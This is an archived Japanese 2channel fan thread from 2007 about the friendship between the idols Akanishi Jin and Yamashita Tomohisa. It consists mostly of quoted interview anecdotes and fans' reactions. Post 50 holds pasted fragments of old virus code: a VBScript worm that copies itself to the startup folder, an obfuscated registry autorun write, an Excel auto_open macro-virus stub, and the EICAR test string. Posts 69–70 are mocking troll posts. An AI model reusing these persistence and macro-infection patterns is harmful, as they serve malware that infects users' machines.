5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

◎◎西P9◎◎

1 :(・゚ρ゚)人( ゚ Д゚):2007/02/11(日) 17:59:15 ID:0+07SBfT
ここは西とP(たまにはU君等も含む)の友情にホコーリするスレです
同人や上記以外の友情を語りたい方は他へどうぞ
基本はsage進行で荒し釣り煽りはスルーしましょう

前スレ
◎◎西P8◎◎
http://tv9.2ch.net/test/read.cgi/jr/1163132989/
◎◎西P7◎◎
http://tv7.2ch.net/test/read.cgi/jr/1159516172/
◎◎(・゚ρ゚)人( ゚ Д゚)6◎◎
http://tv7.2ch.net/test/read.cgi/jr/1154835308/
◎◎西P5◎◎
http://tv7.2ch.net/test/read.cgi/jr/1152024323/
◎◎西P4◎◎
http://tv7.2ch.net/test/read.cgi/jr/1147544145/
◎◎西P3◎◎
http://tv7.2ch.net/test/read.cgi/jr/1142265120/
◎◎西P2◎◎
http://tv7.2ch.net/test/read.cgi/jr/1133631989/
◎◎西P◎◎
http://tv7.2ch.net/test/read.cgi/jr/1100697495/

2 :ユー&名無しネ:2007/02/11(日) 18:27:09 ID:iyNITjpC
>1


3 :ユー&名無しネ:2007/02/11(日) 20:39:15 ID:XX7N/Vjp
>>1

4 :ユー&名無しネ:2007/02/11(日) 21:46:51 ID:Rht1aFMq
>1
乙帰ってこいよ

5 :ユー&名無しネ:2007/02/12(月) 00:02:58 ID:f+QuWSWj
>1


6 :ユー&名無しネ:2007/02/12(月) 10:19:00 ID:Rwka4I+/
西発言
ずーっとPと一緒にいたい
親友なんて言葉じゃたりないくらいPが好き
P以外に美形な男はいない
意地っ張りな所も寂しがりやな所も含めてPが好き
Pと星を見ながら幸せを祈った
P発言
西は宝物
西は素直なとこがいい
いつも一緒だけどこれからもこのままで
西は男らしいし優しい
西とはシンクロしてる
まあそれなりに大好きかも
アイツはオレにオレはアイツに恋してますから(w

7 :ユー&名無しネ:2007/02/12(月) 10:21:09 ID:Rwka4I+/
少蔵
赤西仁から山下智久への手紙
山下智久へ
山下はみんなから大人しいと言われているけど遊んでいる時は全然違う
誰よりも弾けててむしろうるさいくらい
でもねそんな山下の心の中を俺は知ってるつもりです
誰よりも淋しがりやそのくせ負けず嫌い
だから素直に「淋しい」って言えない
だから会った時からバイバイの淋しさを考えてその反動ではしゃぐ
でも1回大喧嘩して絶交状態になってもう友達やめたって
あん時俺なりにマジに凹んで家帰ったら
オマエうちの母ちゃんと飯食いながら一家団欒してたよな
しかも俺の席でしかも俺とは一言も口きかずに
しかも俺の部屋入って先に寝ちゃうし
どういうことでしょうか?そんな状態で3ヶ月も絶交…絶対変だと思います
でもそんな意地っ張りなトコも淋しがりやなトコも含めて俺は好きです
これからもよろしくお願いします

8 :ユー&名無しネ:2007/02/12(月) 10:23:53 ID:Rwka4I+/
少蔵
山下智久から赤西仁への手紙
仁へ
気が付けば早いもので君とは6度目のクリスマスを一緒に過ごす事になりそうですね
正直仁への第一印象は悪かったんだよ
こいつかっこつけてんなーと思ってね
でもあっという間にこう仲良くなって
ただお互いに凄い意地っ張りだからまあすぐ喧嘩もするし
絶交だって1度や2度じゃきかないし
そのくせどちらも絶対に「ごめんね」が言えない
だた俺も仁と口をきけずにいるときホントはすげえ淋しかった
何度も俺からあやまろうかなーと思ったんだけど
結局一度も言えないまま…だから決めました
今年のサンタさんからのプレゼントは赤西仁君から僕に「ごめんね」と言える勇気を
そして僕にも…山下智久

9 :ユー&名無しネ:2007/02/12(月) 10:25:16 ID:Rwka4I+/
P談
まえの夜、赤西と電話で話してたんだけど
「明日起きられるかな…P、明日さぁ…」
のところであいつが寝ちゃったのよ(w
しょうがないから翌日の午前中、あいつんちまで行ってきたのよ
そうしたら赤西の親も弟も誰もいなくて、あいつが部屋でガーガー寝てたの
でも、起こすにはまだビミョーに早い時間だったんだよね
どうしようかなぁ〜って思ってたら食卓にヨーグルトが置いてあったのよ
あいつんち、カスピ海ヨーグルト(菌)育ててるんだ(w
それがドンって置いてあったから
これはオレに食えってことだなと思って、ハチミツかけて食べて(w
それでも時間が余ったからビデオ観てそろそろ起こすか…って思ったところで
そのへんにあったヘルメットかぶってサングラスかけて
赤西の上に馬乗りになって「起きろ!」って揺さぶってみた
そしたら「うわぁ〜〜!」ってすげぇ情けない声で叫んでるのよ(w
「オレオレ!P!」って言ったら、その直後、またカーって寝ちゃって
普通そんなことされたらビビって目がさめんだろ…ってこっちがビックリした(w

10 :ユー&名無しネ:2007/02/12(月) 10:26:48 ID:Rwka4I+/
昨夏少倉
P「なんで俺と仁が仲良くなったかというと
 コイツが俺の事すごい好きみたいで」
西「オマエぶっとばされたいのか(w」
P「チョコチョコついてくるんですよ」
西「あのね違うんです(wふはは
 まあまでもねPを気が合うなとお互いの家を泊まるようになり」
P「そうですね」
西「そのうちオマエが俺んちに三ヶ月間居座るようになり」
P「あはは(wそう、別にそれはオマエが好きじゃなくて」
西「いやいや」
P「オマエの父ちゃんと母ちゃんが好きなの」
西「心外だな」
西P「(w」
西「そんでオマエ俺んちの近くに引っ越してきたんだからね」
P「(wそうだよ」
西「多分オマエは俺の近くに住みたくて来たんだと思うんですよ」
P「オマエぶっとばすぞ(w」
西「まーまー、いいよそう言いたくないプライドがあるのもわかるよ(w」
P「プライドとかじゃなくてえ(w」
西「ほらちょっと恥ずかしい顔になってますがね(w
 多分俺の近くに住んで色々したかったんだよな?(w
 まあ嬉しいよ俺もね(w」
P「うっせー(w」
西「ふはは」

11 :ユー&名無しネ:2007/02/12(月) 10:28:33 ID:Rwka4I+/
雑誌でのPへの質問
・最近爆笑した事は→西がこの世に存在してると思うと笑える
 さっき言った宝物に西も入ってるから
・最近したよいことは?→西がポイ捨てしたガムを拾った
・初キスはいつ?→19才 西との初キスのことだけど(w
 差鞠本番中アクシデント的に唇が触れちゃったよ
親友の西に一言→まあそれなりに大好きかも

12 :ユー&名無しネ:2007/02/12(月) 10:30:48 ID:Rwka4I+/
西の愛犬ピンの名前はぴいとじんから1文字ずつとってつけた
西がピンピンて呼ぶのをぴいだと思って返事すると
お前じゃねえよって言うんだよね

P談
俺の新年はカウコン終わったら西家で過ごすんだ
正月番組見ながらおせち食べたりすんの
一年の計は元旦にありって事は
06年も俺は西と共に過ごすって事か
それでもいいけどね♪


13 :ユー&名無しネ:2007/02/12(月) 10:35:04 ID:Rwka4I+/
ホラー映画見に行って怖いシーンで目つむるPに
金がもったいねえから見ろ無理矢理見させる西

インフルになった西のお見舞いにいってうつってしまったP

昨日は西と遊んでドライブして飯食って一夜を共にして
今日は西と電車乗ってて今から飯食いにいくんだ
勝手に食えってカンジ?(w

二人で買い物してて見つけたジャージをパジャマ用にオソロで買ったんだけど
帰って開けてみたら半袖で使えなくてそのまんまだよ

西が朝起きたら知らない間にPが来てて布団にもぐりこんでる事がある


14 :ユー&名無しネ:2007/02/12(月) 10:36:29 ID:Rwka4I+/
社会人を社会仁と勝手に変換する俺の携帯
そんだけ打ってる回数が多いんだな(w

西がテレビに出てた
朝目開いて最初に見たんだ
おれが鳥なら親だと思っちゃうよアブネー

友達の家のご飯では西家が一番美味い
辛いの好きになったのは西パパの影響


映画にはキャラメルポップコーンが欠かせない
Pも好きで俺らLサイズ1個ずつ食べちゃう

15 :ユー&名無しネ:2007/02/12(月) 10:38:04 ID:Rwka4I+/
西がPについて
寂しがりや、負けず嫌い、自分と似ている部分がある
イナゴかバッタだったらコオロギ、タコかイカだったらエイ
表情があまり豊かではない、すごい嬉しいんだけどあんま顔に出さないクールなタイプ
顔は可愛い顔してる

16 :ユー&名無しネ:2007/02/12(月) 13:46:03 ID:Rwka4I+/
西が☆誌で16冠とったってあームカシク(はあと
なのになんで毎日一緒にいるんだろ(w

ドラマの泣くシーンで大切な人が死んじゃった事考えて涙流した
麺西ごめん(w

なくしたプリクラがいつも西の家で見つかるんだ

新しい香水にした2日後に西から同じ香水の匂いがした(w

パジャマに着替えておでん食べようとしたら寝てたはずの西にシラタキを食べられ
さっきパジャマに着替えていなければ…と悔やむP

P談
西を最愛って言われると恥ずかしいんだけど
駅で大声で歌ったりヘンなとこあるけど
けっこう男らしいし優しいとこあるんだよね

仲良しなのは西かな
感覚が合うというか西といるとすごい楽
ずーっと黙ってて会話しなくてもいいんだ

西とは中1の途中からずっとつるんでたから
何か親友を通りこした気がする

よく2人で虫取りに逝ったしポケモンやったり昼間からホラーみてビビったりした

17 :ユー&名無しネ:2007/02/12(月) 13:47:48 ID:Rwka4I+/
ズニア時代 米国にて
P:一緒に行った仲間のエピ?
 う〜ん何かあったかな?西が口を開けて寝てたことか?(w
地味:西くんに無理矢理寝てるの起こされた時のPは
 笑っちゃってて超かわいかったです!

ズニア時代 西について暴露
P:かわいこぶってる、しつこい、電話を切ってもすぐかけなおしてくるし
 でもあれがなくなるとちょっとサビシイかも
斗:Pのことが大好きでマネばかりしてる
 それを誰かにつっこまれるとPが俺をマネてるんだと言い張る

18 :ユー&名無しネ:2007/02/12(月) 15:17:12 ID:KcKJo06m
…泣けてきた

19 :ユー&名無しネ:2007/02/12(月) 17:03:18 ID:tR68566d
Pと滝沢・西・Uの四柱推命での相性は80点凄いね
Pと斗・オムは0点


20 :ユー&名無しネ:2007/02/12(月) 21:14:44 ID:RXHTUpHp
自分も目汁が・・

21 :ユー&名無しネ:2007/02/12(月) 23:46:53 ID:yM1NT11E
またPの口からこのような言葉を
聞けるようになりたいな(´・ω・`)

22 :ユー&名無しネ:2007/02/12(月) 23:52:58 ID:KcKJo06m
なりたいね
きっと本人達が1番そう思ってるよね
なんか波とかでも自由に名前出せないみたいに感じるし…

23 :ユー&名無しネ:2007/02/13(火) 00:05:31 ID:gwqaBUsf
西きたあああああああああああああああああ

24 :ユー&名無しネ:2007/02/13(火) 00:10:16 ID:aoKBatkW
来たね!来たね!波とかでも自由に名前出せないみたい〜とか書いたばっかでびっくりした
願いがPに通じた!(w

25 :ユー&名無しネ:2007/02/13(火) 00:10:24 ID:T+WPAV9O
ジュンレバ丼のジュンて純?ホコーリですた

26 :ユー&名無しネ:2007/02/13(火) 00:11:13 ID:6EeAsEaN
自由に名前出してるー!!!!

27 :ユー&名無しネ:2007/02/13(火) 00:14:44 ID:aoKBatkW
最近テンション低い?って思ってたけど以前のPっぽい文章で嬉しい…
泣けるよー

28 :ユー&名無しネ:2007/02/13(火) 00:15:36 ID:Ut4Dlcyc
他担ですか失礼します
西Pキ━━(・∀・)━━タ!
それにしても2人はラボラボですね(´∀`*)
たまには℃っくんも入れてやってください(-人-)ナモナモ

29 :ユー&名無しネ:2007/02/13(火) 00:18:45 ID:mSjrXrJl
自分的にも久々Pらしい日記だたと
仁呼びも萌え

30 :ユー&名無しネ:2007/02/13(火) 00:38:52 ID:nC35uTd+
西Pキタ━━━━(゚∀゚)━━━━ッ!
久々に日記画像メモしたぞ!
Pの口から西の名前出ると目汁でるこれ条件反射…

31 :sage:2007/02/13(火) 00:49:07 ID:+kkYJpNo
西Pは不滅デス
嬉しくて自分も目汁

32 :ユー&名無しネ:2007/02/13(火) 00:50:27 ID:xLRqGZ6y
西Pキタ━━━━━━(゚∀゚)━━━━━━ !!!!!
半分個ってキャワすぎる
今なら一人一個食べれるのか
ビンボエピも微笑ましいよ
西だいしてる!早く帰って来い

33 :ユー&名無しネ:2007/02/13(火) 00:55:59 ID:6a1u0+1k
日記に西きたあああー!
あー萌え死しそうorz
西P永遠(・∀・)人(・∀・)

34 :ユー&名無しネ:2007/02/13(火) 00:59:59 ID:lzPPypwj
また半分こしようナー
に西Pの未来を見た・・゚(ノД`)゚・・。

070409には帰って鯉西(w

Pddd!!

35 :ユー&名無しネ:2007/02/13(火) 01:10:02 ID:NR8LbuBM
Pチャソ…希望の光が見えたよ…
西と半分個とか(*´∀`*)モヘ
Pとジュンレバ丼また半分個ずつ食べに戻って来い西

36 :ユー&名無しネ:2007/02/13(火) 01:23:00 ID:yvOwn7nO
>28
いらっさいませ(・∀・)つ旦
西P℃が揃う仕事はなかなかないけど自分も好きです
3人が一緒に並ぶ姿を見られる日が来ることを祈ってます

37 :ユー&名無しネ:2007/02/13(火) 01:41:18 ID:TGaYQU+v
>28
℃っくんならいつでも大歓迎です(´∀`*)

嬉しすぎて久しぶりにここ来た
Pも西もだいしてる


38 :ユー&名無しネ:2007/02/13(火) 02:02:07 ID:MCkQGyxd
>30
同じく画面メモした!
久々にテラウレシスな出来事(w
今週はこれで乗り切れる
P感謝(ww

39 :ユー&名無しネ:2007/02/13(火) 02:38:31 ID:CiIuk3B/
℃ーチャンも好きです
でも西Pはもーーっと好きです

40 :ユー&名無しネ:2007/02/13(火) 02:52:49 ID:4OnRgEyp
思い出語っちゃうPキャワワ
西も食べたそうにしてたってリアルじんじんだったんだろうな

41 :ユー&名無しネ:2007/02/13(火) 03:14:10 ID:pk+oeL/h
もー嬉しすぎる!
Pの仁呼びも思いで話もさることながら西にメールしてその返事まで書いてくれるなんて!
Pもメール返した西もそれのっけた波も皆グッジョブ!

42 :ユー&名無しネ:2007/02/13(火) 03:20:11 ID:QNnB6J+b
西Pは永遠。゚(゚´Д`゚)゜。

43 :ユー&名無しネ:2007/02/13(火) 03:22:44 ID:QNnB6J+b
Pチャン寂しいんだろな…
早く堂々と一緒に半分こできるとイイネ

44 :ユー&名無しネ:2007/02/13(火) 03:33:01 ID:QNnB6J+b
一個ずつ牛丼食べれるのにあえてのジュンレバ丼半分こ
西Pクオリティ半端ねえ

45 :ユー&名無しネ:2007/02/13(火) 03:40:43 ID:QNnB6J+b
んで今なら余裕でジュンレバ丼一個ずつ食べれるのに
あえての半分こを約束する西Pクオリティ
連投スマソ今までの西Pラボラボ日記と何も変わりないのに正直久々で萌えすぎた
西Pだいしてます

46 :ユー&名無しネ:2007/02/13(火) 08:12:09 ID:yjq0bAZN
もう一人一個食べられるよ。゚(゚´Д`゚)゜。

47 :ユー&名無しネ:2007/02/13(火) 09:47:25 ID:TLuAcB4K
一人一個余裕で食べられるけど二人とも
食べすぎ注意報出てるから半分こでちょうどイイ!

48 :ユー&名無しネ:2007/02/13(火) 14:40:19 ID:A5Rd2aQ5
>28
ご遠慮願います
穴兄弟だし


49 :ユー&名無しネ:2007/02/13(火) 17:08:07 ID:eAy2F+ZH
自分忙しくて日記今見たけど
もう目から変な汁がとまらない・・
西P最高だよ
西はやく戻ってきてね


50 :ユー&名無しネ:2007/02/13(火) 20:43:05 ID:kw5nLh0L
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub


51 :ユー&名無しネ:2007/02/14(水) 01:36:51 ID:9XfwaBJy
仁Pは本当ラブラブですなぁ
将来一緒にハワイ住むんだから
早く帰ってきて働いて金貯めれ

52 :ユー&名無しネ:2007/02/14(水) 01:42:36 ID:9XfwaBJy
まさかと思うが将来のハワイ住みの為の語学留学じゃないよな西

53 :ユー&名無しネ:2007/02/14(水) 11:21:19 ID:/OwBiAdj
将来本気でハワイ移住するつもりだとオモ

54 :ユー&名無しネ:2007/02/14(水) 16:57:33 ID:aX7flTgF
Pと西は将来ハワイで住むのか
2人一緒だと寂しくないね

55 :ユー&名無しネ:2007/02/14(水) 17:38:31 ID:vV2XdGkL
昔一緒にハワイに住む発言西Pしてたけど最近はなかたよ
本気で住むつもりの留学なら西スゴス

56 :ユー&名無しネ:2007/02/14(水) 22:37:46 ID:gxPevl2K
どういう目的で留学したのかはワカラナス・・
けど西とPが幸せになってくれればジヌンはもう満足だよ

57 :ユー&名無しネ:2007/02/15(木) 08:11:11 ID:957oGxoT
性的関係は一切無いけどお互い恋愛に似た感情はあったかもしれんね

58 :ユー&名無しネ:2007/02/15(木) 09:30:32 ID:bRUs5caG
何かうんざり


59 :ユー&名無しネ:2007/02/15(木) 13:34:11 ID:taGO2fc/
マブダチは恋人以上

60 :ユー&名無しネ:2007/02/15(木) 17:43:21 ID:EsL/urEA
恋人以上は家族だね
西とPは自分たちでもファミリーって言ってるし

61 :ユー&名無しネ:2007/02/15(木) 18:32:18 ID:BcF+6UEh
兄弟みたいって本人達が言ってるしな

62 :ユー&名無しネ:2007/02/16(金) 02:08:15 ID:9zgnmPXd
血繋がってる家族みたいに本当に素でいられる関係って裏山だよな
西Pはちょっとお互い好き合い杉だろと思うけど(w
本当に家族ぐるみで仲良いしワンコもイパーイいるし萌え

63 :ユー&名無しネ:2007/02/16(金) 09:51:27 ID:xuAWui48
U君ブログに何だか希望が見えた気がした
早く西も一緒に温泉行けるといいな

64 :ユー&名無しネ:2007/02/16(金) 12:03:29 ID:ip5i2C/D
U君日記PUで温泉行った
もう一人の親友帰ってきたら3人で行きたいみたいな
西PUキャワ

65 :ユー&名無しネ:2007/02/16(金) 14:22:10 ID:lPmDQ9K5
西PUキタ!
温泉3人で行ける日がくるといいね

66 :ユー&名無しネ:2007/02/16(金) 21:49:33 ID:uWcL4nob
最近西Pファソになったのでズニア時代のなつかしエピ
もっともっと教えてくらさい

67 :ユー&名無しネ:2007/02/16(金) 22:15:23 ID:jUbUaFZz
3人で温泉行きたいって3年前から言ってたな
今年こそ行けるといいね

68 :ユー&名無しネ:2007/02/18(日) 10:42:28 ID:6FcujEmR
西Pは永遠

69 :ユー&名無しネ:2007/02/18(日) 22:19:11 ID:EMu9uM89
恋愛下手な「あなた」に教えてあげる

・女から告白されて振ったのにまた電話して誘うな
・振った女に「お前がスキなんだぁ付き合って」という事は絶対にするな
 

だからあなたはモテないんですよww自業自得wwwwwwwwwwwww
あなたはイイ男じゃない
ただのバカです


70 :ユー&名無しネ:2007/02/18(日) 22:22:40 ID:EMu9uM89
あなたはこれを何回繰り返しましたか??
もうあなたをスキになってくれる男はいないでしょうwwwwwwww

ぎゃははは


71 :ユー&名無しネ:2007/02/19(月) 18:56:09 ID:fCLbWxwD
プレミアムでハワイに住むって言ってたな


72 :ユー&名無しネ:2007/02/19(月) 19:06:21 ID:ggx2OOQx
プレミアムで仲良い人で西話できたら良かったんだけどやっぱり名前出せなかったね
石鹸に馴染めなかった頃はカツンの楽屋にいたりバスで西の隣に座ってたりしてたねPちゃん

73 :ユー&名無しネ:2007/02/20(火) 22:55:31 ID:+1em0NsI
プレミアムは仲良しの西とか地味の話しはカットされたかもね
地味もPと一緒にデビューする筈だったの元ジャニがブログで書いてた

74 :ユー&名無しネ:2007/02/21(水) 13:23:17 ID:qr392Zzl
地味ってだいぶ若くなかったけ?一緒にデブするには年がつりあわない
エロと森息子は特待生だから除外

75 :ユー&名無しネ:2007/02/21(水) 14:05:57 ID:3rsREcht
石鹸の話でツライの誰にも言えなかたって眼潤んでたな
仕事の話だし西にも言わなかったのか
西の名前を出せなかったのか
言わずとも理解し合ってたのか
色々と切ナス

76 :ユー&名無しネ:2007/02/21(水) 20:29:05 ID:/ZTZdCoX
活動休止決まってソイエラジオ代役出演した日に
西とオソロ時計買いに行ったっけね
あの辛い日の支えは西だったと思うよ

77 :ユー&名無しネ:2007/02/22(木) 01:28:48 ID:VR3lRtwW
犬散歩といえば西とピン抱っこしたPが公園お散歩とかよく目情で見たなあ
西早く帰ってきて欲しいけど自分が納得いくまで頑張れ
西Pだいしてる

78 :ユー&名無しネ:2007/02/22(木) 01:44:22 ID:VR3lRtwW
自分もPが甘えたり素でいられるのは西だけだったと思うよ
たぶんPは誰にも弱音を見せたりしない人だと思うけど
西は黙ってても理解してくれて居心地良かったんだろな
キモスで申し訳ないが西にお父さん重ねてる部分あったと思う
どっちも不器用だけどまっすぐで愛しいよ

79 :ユー&名無しネ:2007/02/22(木) 16:05:46 ID:XO3PhDLC
人に簡単に心開けないPが
あんなに西と仲良しアピするのは
なんかすごいことだよね
Pの心を開けた西スゴス

80 :ユー&名無しネ:2007/02/22(木) 16:53:47 ID:tpdwSb+1
西は良くも悪くも緩い人だからPは気を使わず楽でいられた鴨
Pの云うズニアで心開いた人は斗℃西だろうね

81 :ユー&名無しネ:2007/02/22(木) 18:42:26 ID:xnhtiEEU
>79
逆じゃない?子供の頃は心を開けたのに今は…って感じ
歯を見せて笑わなくなるのは歯並びだけじゃなくて心の問題もあるとオモ
大人になるにつれて色々あるんだと思う

82 :ユー&名無しネ:2007/02/22(木) 21:16:21 ID:tpdwSb+1
>81
プレミアム見た?ズニア時代の話だよ

83 :ユー&名無しネ:2007/02/22(木) 23:21:11 ID:miYj64GF
>79-82
じゃ今はどっちにせよイマイチ心開いていないのかな?(´;ω;`)

84 :ユー&名無しネ:2007/02/23(金) 15:08:40 ID:IWLquWjW
>83
何故そう思う?
アンチか

85 :ユー&名無しネ:2007/02/23(金) 21:17:11 ID:aMHQWi+E
そうでもないでしょ

20 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)